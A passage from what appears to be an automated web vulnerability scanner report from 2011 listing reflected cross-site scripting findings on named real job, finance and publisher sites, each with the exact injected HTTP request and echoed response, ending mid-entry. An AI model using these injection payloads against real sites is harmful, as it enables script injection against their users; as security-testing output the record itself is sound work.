Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:35:04 GMT
Content-Length: 61534


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATDd412c'-alert(1)-'1cf6036fd5b&JobId=131750&JobName=Acct-Exec-Small-Business-Sales';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!='
...[SNIP]...

1.108. http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/131750/Acct-Exec-Small-Business-Sales

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6112'-alert(1)-'19d36ec284c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&f6112'-alert(1)-'19d36ec284c=1 HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:37:14 GMT
Content-Length: 63142


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&f6112'-alert(1)-'19d36ec284c=1&JobId=131750&JobName=Acct-Exec-Small-Business-Sales';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!
...[SNIP]...

1.109. http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales [reflink parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/131750/Acct-Exec-Small-Business-Sales

Issue detail

The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 156da'-alert(1)-'1fcb5beb4d8 was submitted in the reflink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia156da'-alert(1)-'1fcb5beb4d8&cobrand=ATD HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:33:24 GMT
Content-Length: 63279


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia156da'-alert(1)-'1fcb5beb4d8&cobrand=ATD&JobId=131750&JobName=Acct-Exec-Small-Business-Sales';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(O
...[SNIP]...

1.110. http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC [cobrand parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC

Issue detail

The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ec4b'-alert(1)-'adbf5650abc was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD7ec4b'-alert(1)-'adbf5650abc HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.2.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:35:46 GMT
Content-Length: 66069


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD7ec4b'-alert(1)-'adbf5650abc&JobId=134401&JobName=AT-T-Application-Sales-Executive-3-PCG-MAC';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(O
...[SNIP]...

1.111. http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b923c'-alert(1)-'c322821b1b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&b923c'-alert(1)-'c322821b1b3=1 HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.2.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:37:41 GMT
Content-Length: 67699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&b923c'-alert(1)-'c322821b1b3=1&JobId=134401&JobName=AT-T-Application-Sales-Executive-3-PCG-MAC';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof
...[SNIP]...

1.112. http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC [reflink parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC

Issue detail

The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95428'-alert(1)-'c228a9bf103 was submitted in the reflink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia95428'-alert(1)-'c228a9bf103&cobrand=ATD HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.2.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:33:40 GMT
Content-Length: 67830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia95428'-alert(1)-'c228a9bf103&cobrand=ATD&JobId=134401&JobName=AT-T-Application-Sales-Executive-3-PCG-MAC';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
i
...[SNIP]...

1.113. http://sbklivequoteserverdl.smartmoney.com/livequote/tokenJSON [jsoncallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sbklivequoteserverdl.smartmoney.com
Path:   /livequote/tokenJSON

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 3f0cf<a>e90c4a69c92 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /livequote/tokenJSON?list=NLS:$I.DJI,$I.COMPX,$INX&jsoncallback=jQuery151023154082498513162_13154165581683f0cf<a>e90c4a69c92&_=1315416558239 HTTP/1.1
Host: sbklivequoteserverdl.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=2f47fc3e-f5cc-45d9-a394-82d100bc56a1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/x-javascript
Date: Wed, 07 Sep 2011 12:28:56 GMT
Content-Length: 163

jQuery151023154082498513162_13154165581683f0cf<a>e90c4a69c92({"token" : "D0647A776FCC8CCED063917E5C8DD51A", "data" : "11139.3|-100.96,2473.83|-6.5,1165.24|-8.73"})

1.114. http://services.harpercollins.com/widgets/subscription/default.aspx [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/default.aspx

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3baae"%3balert(1)//18e3cd7c00e was submitted in the pt parameter. This input was echoed as 3baae";alert(1)//18e3cd7c00e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/default.aspx?sid=2&pt=nl3baae"%3balert(1)//18e3cd7c00e&pv=N42&dn=default HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:24:41 GMT
Content-Length: 1591


var theURL = document.URL;
var hasQueryString = theURL.indexOf("?");
var qsRefresh = "";

if (hasQueryString != -1) {
   var theQS = theURL.substring(hasQueryString+1, theURL.length);
   var arg
...[SNIP]...
<link rel=\"stylesheet\" type=\"text\/css\" href=\"http://services.harpercollins.com\/widgets\/subscription\/css\/style.aspx?sid=2&pt=nl3baae";alert(1)//18e3cd7c00e&pv=n42&dn=default" + qsRefresh + "\" \/>
...[SNIP]...

1.115. http://services.harpercollins.com/widgets/subscription/default.aspx [pv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/default.aspx

Issue detail

The value of the pv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6040d"%3balert(1)//c2ca12fcdf3 was submitted in the pv parameter. This input was echoed as 6040d";alert(1)//c2ca12fcdf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/default.aspx?sid=2&pt=nl&pv=N426040d"%3balert(1)//c2ca12fcdf3&dn=default HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:24:43 GMT
Content-Length: 1591


var theURL = document.URL;
var hasQueryString = theURL.indexOf("?");
var qsRefresh = "";

if (hasQueryString != -1) {
   var theQS = theURL.substring(hasQueryString+1, theURL.length);
   var arg
...[SNIP]...
<link rel=\"stylesheet\" type=\"text\/css\" href=\"http://services.harpercollins.com\/widgets\/subscription\/css\/style.aspx?sid=2&pt=nl&pv=n426040d";alert(1)//c2ca12fcdf3&dn=default" + qsRefresh + "\" \/>
...[SNIP]...

1.116. http://services.harpercollins.com/widgets/subscription/js/widget.aspx [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/js/widget.aspx

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f773"%3balert(1)//ee38c3c5290 was submitted in the mid parameter. This input was echoed as 2f773";alert(1)//ee38c3c5290 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/js/widget.aspx?sid=2&pt=nl&pv=n42&dn=default&mid=2f773"%3balert(1)//ee38c3c5290&parentLoc=http%3A//www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke%3Fisbn%3D9780061358203%26HCHP%3DTB_Protecting+Your+Parents++Money HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-173804716-1315416306399; fsr.a=1315416306405; mmpa.tst=0.005; mmcore.tst=0.715; mmcore.mmact=; mmcore.srv=cg1.usw; mmcore.pd=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; mmid=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:25:17 GMT
Content-Length: 30335


document.write("<font class=\"fontGlobal2nln42default\"><div id=\"divHCWidgetHead2nln42default\"></div>");
document.write("<div id=\"divHCWidgetBody2nln42default\" class=\"HCTextSty
...[SNIP]...
"nl");
var strProgramType2nln42default = GetProgramType2nln42default("nl");
var iCurrentState2nln42default = 0;
var iPrevState2nln42default = 0;
var MarketingId = "2f773";alert(1)//ee38c3c5290";

//Global object assignments
var divHCWidgetBody2nln42default = document.getElementById("divHCWidgetBody2nln42default");
var divHCMarketingCopy2nln42default = document.ge
...[SNIP]...

1.117. http://services.harpercollins.com/widgets/subscription/js/widget.aspx [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/js/widget.aspx

Issue detail

The value of the pt request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 24aec%3balert(1)//c4608435b21 was submitted in the pt parameter. This input was echoed as 24aec;alert(1)//c4608435b21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/js/widget.aspx?sid=2&pt=nl24aec%3balert(1)//c4608435b21&pv=n42&dn=default&mid=&parentLoc=http%3A//www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke%3Fisbn%3D9780061358203%26HCHP%3DTB_Protecting+Your+Parents++Money HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-173804716-1315416306399; fsr.a=1315416306405; mmpa.tst=0.005; mmcore.tst=0.715; mmcore.mmact=; mmcore.srv=cg1.usw; mmcore.pd=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; mmid=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:25:10 GMT
Content-Length: 38434


document.write("<font class=\"fontGlobal2nl24aec;alert(1)//c4608435b21n42default\"><div id=\"divHCWidgetHead2nl24aec;alert(1)//c4608435b21n42default\"></div>");
document.write("<div
...[SNIP]...
tBtn2nl24aec;alert(1)//c4608435b21n42default", "http://services.harpercollins.com/widgets/subscription/images/submit_dark.png", true);

//Widget variable declarations
var WidgetId2nl24aec;alert(1)//c4608435b21n42default = 99;
var SiteId2nl24aec;alert(1)//c4608435b21n42default = 2;
var ProgramType2nl24aec;alert(1)//c4608435b21n42default = "nl";
var ProgramValue2nl24aec;alert(1)//c4
...[SNIP]...

1.118. http://services.harpercollins.com/widgets/subscription/js/widget.aspx [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/js/widget.aspx

Issue detail

The value of the pt request parameter is copied into a JavaScript rest-of-line comment. The payload f1c69%0aalert(1)//6c8b0e2d7df was submitted in the pt parameter. This input was echoed as f1c69
alert(1)//6c8b0e2d7df
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

